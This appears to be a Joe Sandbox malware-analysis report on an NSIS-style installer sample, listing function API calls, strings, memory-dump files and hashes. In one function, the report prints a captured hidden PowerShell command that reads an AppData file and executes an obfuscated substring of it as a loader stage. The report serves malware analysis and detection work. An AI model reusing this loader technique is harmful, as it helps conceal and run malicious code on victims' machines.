SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404212
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404221
lstrlenA.KERNEL32(?), ref: 00404224
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404233
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404248
GetDlgItem.USER32(?,0000040A), ref: 004042AA
SendMessageA.USER32(00000000), ref: 004042AD
GetDlgItem.USER32(?,000003E8), ref: 004042D8
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404318
LoadCursorA.USER32(00000000,00007F02), ref: 00404327
SetCursor.USER32(00000000), ref: 00404330
ShellExecuteA.SHELL32(0000070B,open,004226A0,00000000,00000000,00000001), ref: 00404343
LoadCursorA.USER32(00000000,00007F00), ref: 00404350
SetCursor.USER32(00000000), ref: 00404353
SendMessageA.USER32(00000111,00000001,00000000), ref: 0040437F
SendMessageA.USER32(00000010,00000000,00000000), ref: 00404393

Strings

N, xrefs: 004042C6
open, xrefs: 0040433B

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: N$open
API String ID: 3615053054-904208323
Opcode ID: aa854a75b9a8ef41e2656ff54a1ab69c816baf86c41e2f577b142ace3155aca6
Instruction ID: e12ca537bcd72e8a05bc460f10c87f41301461b9037796019f3247b39f6fe1bc
Opcode Fuzzy Hash: aa854a75b9a8ef41e2656ff54a1ab69c816baf86c41e2f577b142ace3155aca6
Instruction Fuzzy Hash: 9361A0B1A40209BFEB109F61DD45F6A7B69FB84704F108026FB04BB2D1C7B8A951CB99

Function 00405A29 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 136stringmemoryfileCOMMON

Download Yara Rule

APIs

lstrcpyA.KERNEL32(00421A88,NUL,?,00000000,?,00000000,?,00405BCD,?,?,00000001,00405770,?,00000000,000000F1,?), ref: 00405A39
CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,?,00405BCD,?,?,00000001,00405770,?,00000000,000000F1,?), ref: 00405A5D
GetShortPathNameA.KERNEL32(00000000,00421A88,00000400), ref: 00405A66

Part of subcall function 004058E7: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B16,00000000,[Rename],00000000,00000000,00000000), ref: 004058F7
Part of subcall function 004058E7: lstrlenA.KERNEL32(00405B16,?,00000000,00405B16,00000000,[Rename],00000000,00000000,00000000), ref: 00405929

GetShortPathNameA.KERNEL32(?,00421E88,00000400), ref: 00405A83
wsprintfA.USER32 ref: 00405AA1
GetFileSize.KERNEL32(00000000,00000000,00421E88,C0000000,00000004,00421E88,?,?,?,?,?), ref: 00405ADC
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405AEB
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405B23
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00421688,00000000,-0000000A,004093A0,00000000,[Rename],00000000,00000000,00000000), ref: 00405B79
WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405B8B
GlobalFree.KERNEL32(00000000), ref: 00405B92
CloseHandle.KERNEL32(00000000), ref: 00405B99

Part of subcall function 00405982: GetFileAttributesA.KERNELBASE(00000003,00402CBC,C:\Users\user\Desktop\Nt8BLNLKN7.exe,80000000,00000003), ref: 00405986
Part of subcall function 00405982: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059A8

Strings

[Rename], xrefs: 00405B0B, 00405B1D
%s=%s, xrefs: 00405A97
NUL, xrefs: 00405A33

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
String ID: %s=%s$NUL$[Rename]
API String ID: 1265525490-4148678300
Opcode ID: f37ac594430da83018f04a4547826f7a07ed016582ff29ad24a376af527490d1
Instruction ID: b425f8375b2a923a6c6e646106298c69547d2110189afc57e8bc93149b7758b2
Opcode Fuzzy Hash: f37ac594430da83018f04a4547826f7a07ed016582ff29ad24a376af527490d1
Instruction Fuzzy Hash: 2D41EE71A04A15AFD2206B219C49F6B3A6CDF45725F14013ABE06F62D2DA7CB8008E7D

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,00422F00,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: c2d680870d7abd1e1a74e136b5aebc8f23ebe5596e06de1d1944de18111d68fb
Instruction ID: ce5436bc7dfccdabf5b2378cdbc04c65b8fc1f8d51739f20964cb8902a5fcb59
Opcode Fuzzy Hash: c2d680870d7abd1e1a74e136b5aebc8f23ebe5596e06de1d1944de18111d68fb
Instruction Fuzzy Hash: F2419A72804249AFCF058F94CD459AFBFB9FF44310F00812AF961AA1A0C738EA50DFA5

Function 00405F5C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Nt8BLNLKN7.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,004031EF,C:\Users\user~1\AppData\Local\Temp\,771B3410,004033C9), ref: 00405FB4
CharNextA.USER32(?,?,?,00000000), ref: 00405FC1
CharNextA.USER32(?,"C:\Users\user\Desktop\Nt8BLNLKN7.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,004031EF,C:\Users\user~1\AppData\Local\Temp\,771B3410,004033C9), ref: 00405FC6
CharPrevA.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,004031EF,C:\Users\user~1\AppData\Local\Temp\,771B3410,004033C9), ref: 00405FD6

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405F5D, 00405F62
*?|<>/":, xrefs: 00405FA4
"C:\Users\user\Desktop\Nt8BLNLKN7.exe", xrefs: 00405F98

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\Nt8BLNLKN7.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
API String ID: 589700163-110445336
Opcode ID: 8e6880dbf60680850995486114707e5442f3544b6a214aee6d9330f98436af3b
Instruction ID: 7b30a10291eb0396c8f4e95b118cc70be9f64314849ede57e52aca42a9cf7d7a
Opcode Fuzzy Hash: 8e6880dbf60680850995486114707e5442f3544b6a214aee6d9330f98436af3b
Instruction Fuzzy Hash: 9E11C451808B962AEB3216344C44F77BF99CF56760F18007BE9C4B22C2D67C5C429B6D

Function 00404053 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000EB), ref: 00404070
GetSysColor.USER32(00000000), ref: 0040408C
SetTextColor.GDI32(?,00000000), ref: 00404098
SetBkMode.GDI32(?,?), ref: 004040A4
GetSysColor.USER32(?), ref: 004040B7
SetBkColor.GDI32(?,?), ref: 004040C7
DeleteObject.GDI32(?), ref: 004040E1
CreateBrushIndirect.GDI32(?), ref: 004040EB

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
Instruction ID: 47825c477eeffae7bcc1b4b45db8633c52535f80fcd06c8b97140eed864a5805
Opcode Fuzzy Hash: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
Instruction Fuzzy Hash: 0621A4B18047049BCB309F68DD08B4BBBF8AF40714F048639EA95F26E1C738E944CB65

Function 00402683 Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026D7
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026F3
GlobalFree.KERNEL32(?), ref: 0040272C
WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 0040273E
GlobalFree.KERNEL32(00000000), ref: 00402745
CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 0040275D
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 00402771

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID:
API String ID: 3294113728-0
Opcode ID: bafe5094320afd5ed78c565945206d1300e9f63e62b661fc9f8f5877e4445c32
Instruction ID: 472e44718213d797f05a3dbe32253835b8d43bc481b2fe7e733f1056bea7f704
Opcode Fuzzy Hash: bafe5094320afd5ed78c565945206d1300e9f63e62b661fc9f8f5877e4445c32
Instruction Fuzzy Hash: D9318DB1C00118BBCF216FA5CD89DAE7E79EF09364F10423AF520772E1C6795D419BA9

Function 00402BDA Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00402BF2
GetTickCount.KERNEL32 ref: 00402C10
wsprintfA.USER32 ref: 00402C3E

Part of subcall function 00404FDC: lstrlenA.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) ",00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405015
Part of subcall function 00404FDC: lstrlenA.KERNEL32(00402C51,Execute: "Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) ",00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405025
Part of subcall function 00404FDC: lstrcatA.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) ",00402C51,00402C51,Execute: "Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) ",00000000,00000000,00000000), ref: 00405038
Part of subcall function 00404FDC: SetWindowTextA.USER32(Execute: "Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) ",Execute: "Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) "), ref: 0040504A
Part of subcall function 00404FDC: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405070
Part of subcall function 00404FDC: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040508A
Part of subcall function 00404FDC: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405098

CreateDialogParamA.USER32(0000006F,00000000,00402B42,00000000), ref: 00402C62
ShowWindow.USER32(00000000,00000005), ref: 00402C70

Part of subcall function 00402BBE: MulDiv.KERNEL32(00052828,00000064,000536FC), ref: 00402BD3

Strings

... %d%%, xrefs: 00402C38

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: 2f85d0ff04a3e8af9832aa2386f40eece37b54450e37b99d2112a2c5b3a93428
Instruction ID: 37d10fed78b44bbf962512fa666ce1a12177f0d23356d60e90fa74daf698f4f0
Opcode Fuzzy Hash: 2f85d0ff04a3e8af9832aa2386f40eece37b54450e37b99d2112a2c5b3a93428
Instruction Fuzzy Hash: 900165B0949614ABDB216F64AE4DE9F7B78BB01701714C037FA01B11E1C6B8D541CB9E

Function 004048A7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004048C2
GetMessagePos.USER32 ref: 004048CA
ScreenToClient.USER32(?,?), ref: 004048E4
SendMessageA.USER32(?,00001111,00000000,?), ref: 004048F6
SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040491C

Strings

f, xrefs: 004048F8

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
Instruction ID: add3c7f7873227bd74a4bce1351eac807b502806bceb4e0d6bae9f806a4b5eb6
Opcode Fuzzy Hash: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
Instruction Fuzzy Hash: 61014C75D00218BAEB11DBA4DC85BFFBBBCAB55711F10412BBA10B62C0C7B4A9018BA5

Function 00401D26 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D29
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D36
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D45
ReleaseDC.USER32(?,00000000), ref: 00401D56
CreateFontIndirectA.GDI32(0040A7D0), ref: 00401DA1

Strings

Times New Roman, xrefs: 00401D87

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Times New Roman
API String ID: 3808545654-927190056
Opcode ID: cef6f2cea5ba3c3df2e6ab678a22e4db87c9e469595493a26a68610c0a25cdc5
Instruction ID: 34424dcacaa19df80ac017e3b34477b9893efc0acb885e50cf323370767d2cbe
Opcode Fuzzy Hash: cef6f2cea5ba3c3df2e6ab678a22e4db87c9e469595493a26a68610c0a25cdc5
Instruction Fuzzy Hash: 05011271948340AFE701DBB0AE0AB9A7F74EB19705F108435F141B72E2C6B954159B2F

Function 00402B42 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B5D
wsprintfA.USER32 ref: 00402B91
SetWindowTextA.USER32(?,?), ref: 00402BA1
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BB3

Strings

verifying installer: %d%%, xrefs: 00402B86, 00402B8F
unpacking data: %d%%, xrefs: 00402B7F

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: 99857fb9a0cb22b8e24de3565838d35ba34270d242ce7178ee6913b7a03a7076
Instruction ID: 1ce9201bfa48cab7b8fa553f1801af8382b39519b903b04a6adfa3bfa778fb21
Opcode Fuzzy Hash: 99857fb9a0cb22b8e24de3565838d35ba34270d242ce7178ee6913b7a03a7076
Instruction Fuzzy Hash: 0DF01D70900208ABEF215F61CD4ABEE3779EB00345F00803AFA06B51D0D7F8AA558B9A

Function 004047C5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 78stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(reckling: Installing,reckling: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004046E5,000000DF,0000040F,00000400,00000000), ref: 00404853
wsprintfA.USER32 ref: 0040485B
SetDlgItemTextA.USER32(?,reckling: Installing), ref: 0040486E

Strings

%u.%u%s%s, xrefs: 0040483D
reckling: Installing, xrefs: 00404842, 0040484A, 00404850, 00404864

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
